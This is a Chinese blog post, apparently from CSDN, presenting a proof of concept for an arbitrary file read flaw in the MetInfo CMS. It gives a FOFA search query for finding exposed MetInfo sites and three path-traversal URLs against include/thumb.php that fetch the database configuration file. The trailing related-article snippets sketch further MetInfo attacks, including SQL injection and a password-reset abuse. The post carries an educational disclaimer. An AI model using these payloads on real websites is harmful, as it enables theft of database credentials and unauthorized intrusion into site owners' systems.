漏洞挖掘姿势之metinfo 建站系统-任意文件读取漏洞

thinknothing_

于 2024-05-10 23:56:01 发布

阅读量557

点赞数 13

分类专栏：漏洞挖掘姿势分享文章标签：安全

本文链接：https://blog.csdn.net/Grace_for_it/article/details/138686683

版权

漏洞挖掘姿势分享专栏收录该内容

4 篇文章 0 订阅

订阅专栏

1.fofa语法：

app="metinfo"

图标：

资产：

2.poc：

拼接url:

/include/thumb.php?dir=..././http/..././config/config_db.php
/include/thumb.php?dir=.....///http/.....///config/config_db.php
/include/thumb.php?dir=http/.....///.....///config/config_db.php

如果回显页面是这样的话使用bp进行重放处理，即可读取数据库配置文件：

3.bp抓取验证：

脱敏处理：

证明漏洞存在即可，不要做任何破坏。

声明：此篇文章只做技术分享，提供读者学习与交流，禁止做非法未授权渗透测试！

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

thinknothing_

关注关注

13
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

metinfo_6.0.0 任意文件读取漏洞复现

薛定谔嘚喵博客

05-04

1015

MetInfo是一套使用PHP和Mysql开发的内容管理系统。MetInfo 6.0.0~6.1.0版本中的 old_thumb.class.php文件存在任意文件读取漏洞。攻击者可利用漏洞读取网站上的敏感文件。

文件读取漏洞复现（Metinfo 6.0.0）

m0_56578216的博客

08-31

882

安装phpstudy，下载MetInfo 6.0.0版本软件，复制到phpstudy目录下的www目录中。

参与评论您还未登录，请先登录后发表或查看评论

【MetInfo任意文件读取】--任意文件读取漏洞

m0_63241485的博客

08-29

3755

任意文件读取漏洞分析

如何修复php网站漏洞

网站漏洞修复专家

04-08

3818

近日，我们SINE安全对metinfo进行网站安全检测发现，metinfo米拓建站系统存在高危的sql注入漏洞，攻击者可以利用该漏洞对网站的代码进行sql注入攻击，伪造恶意的sql非法语句，对网站的数据库，以及后端服务器进行攻击，该metinfo漏洞影响版本较为广泛，metinfo6.1.0版本，metinfo 6.1.3版本，metinfo 6.2.0都会受到该网站漏洞的攻击。 metinfo...

[漏洞复现] metinfo_6.0.0_file-read(任意文件读取)

yuan_boss的博客

08-31

1184

MetInfo 6.0.0版本链接下载：https://pan.baidu.com/s/16kYqawGMVisbo600c1atzQ?MetInfo 是一套使用PHP 和MySQL 开发的内容管理系统。MetInfo 6.0.0 版本中的。本次漏洞复现仅供学习使用，如若非法他用，与平台和本文作者无关，需自行负责！文件存在任意文件读取漏洞。攻击者可利用漏洞读取网站上的敏感文件。

记一次MetInfo6.0.0文件包含漏洞复现

weixin_55404107的博客

10-20

1790

进行漏洞复现，读取敏感文件

metinfo thumb.php,MetInfo最新版任意文件读取

weixin_39626369的博客

03-26

204

攻击者通过提交精心构造的参数可以获取服务器端任意文件内容！MetInfo 5.2(当前最新版本)的 include/thumb.php 文件本来用来获取缩略图，但是其构造的缩略图路径存在外部可控变量，攻击者可以借此获取任意文件内容：include/thumb.php关键代码如下$ext1 = explode("/", $dir); //$dir变量由外部传入$count = count($ext...

MetInfo前台注入漏洞

willow_liang的博客

11-05

410

漏洞存在点在C:\phpstudy\WWW\MetInfo6.1.2\app\system\message\web\message.class.php文件第三十七行 1.由于C:/phpstudy/WWW/MetInfo6.1.2/app/system/include/function/common.func.phpINADMIN常量没有定义，所以使用sqlinsert语句来对用户的输入内容来进行sql危险字符的过滤。想办法绕到下面的代码，让IN_ADMIN是一个常量。 2.可以先利用admin/inde

MetInfo 企业建站系统 v5.3.16

12-01

**MetInfo 企业建站系统 v5.3.16** MetInfo 是一款专为企业建站设计的内容管理系统（CMS），其v5.3.16版本具有诸多优势，深受新手和有一定PHP基础的开发者喜爱。该系统以轻量级、易用性著称，为快速搭建专业的企业...

metinfo thumb.php,MetInfo最新版任意文件读取 | CN-SEC 中文网

weixin_35587255的博客

03-26

179

摘要攻击者通过提交精心构造的参数可以获取服务器端任意文件内容！MetInfo 5.2(当前最新版本)的 include/thumb.php 文件本来用来获取缩略图，但是其构造的缩略图路径存在外部可控变量，攻击者可以借此获取任意文件内容：include/thumb.php关键代码如下攻击者通过提交精心构造的参数可以获取服务器端任意文件内容！MetInfo 5.2(当前最新版本)的 include/t...

代码审计-MetInfo CMS任意文件读取漏洞

weixin_30878501的博客

05-19

227

0x01 代码分析发现在app\system\include\module\old_thumb.class.php疑似有任意文件读取漏洞 public function doshow(){ global $_M; $dir = str_replace(array('../','./'), '', $_GET['dir']); ...

MetInfo4.0越权漏洞

weixin_47346400的博客

02-18

4352

漏洞复现 step1：点击会员中心 step2：注册一个abcd，密码为123456的账户然后登录该abcd账户，并修改密码时burp抓包，并将abcd改为admin，于是就出现垂直越权的漏洞。原来的admin密码为123456787，后为123456789 ...

【学习笔记】 MetInfo 6.0.0 任意文件读取漏洞

chualam的博客

11-02

865

readfile函数(xx) 控制xx里面的内容就可以实现任意读取

MetInfo5.3管理员密码重置漏洞

HeTuiPei的博客

07-23

765

需要工具Burp 虚拟机kali 浏览器点击忘记密码下一步输入已知用户名或者邮箱点击下一步用Burp拦截右键发送到Repeater 在第一行php后面拼接？met_host虚拟机kali的ip地址:端口号拼接完成后用虚拟机监听拼接的端口号点击GO 虚拟机就会监听到信息里面包含两个网页地址复制粘贴用浏览器打开就完 ...

metinfo5.0 文件包含漏洞分析

最新发布

Au_Wind的博客

11-06

292

基于代码审计，对metinfo5.0文件包含漏洞分析复现

【漏洞复现】Metinfo6.0.0任意文件读取漏洞复现

过期的秋刀鱼

11-05

444

dir变量接受来自$_GET[‘dir’]传递进来的值，用了str_replace函数做替换，将。漏洞简介：MetInfo是一套使用PHP和MySQL开发的内容管理系统，其中的。文件存在任意文件读取漏洞，攻击者可利用该漏洞读取网站的敏感文件。漏洞名称：MetInfo任意文件读取。影响版本：MetInfo 6.0.0。

MetInfo 3.0 PHP代码注入漏洞(getshell)

kendyhj9999的专栏

05-29

1517

MetInfo 3.0 PHP代码注入漏洞(getshell) 来源：本站转载作者：佚名时间：2010-11-07 TAG：我要投稿官网：http://www.metinfo.cn/ 关键字："Powered by MetInfo 3.0 " 来源：http://www.myhack58.com/Article/html/3/62/2010/28291.htm

最新系统漏洞--Metinfo SQL注入漏洞

weixin_48555088的博客

11-09

2238

MetInfo站内优化全攻略：提升权重与排名

本文将详细介绍如何利用MetInfo系统自带的优化机制进行有效的站内优化。首先，确定首选域是优化的第一步。为了确保搜索引擎识别并优先抓取你希望推广的域名，你需要统一www与非www版本的URL。如果你的主机支持301...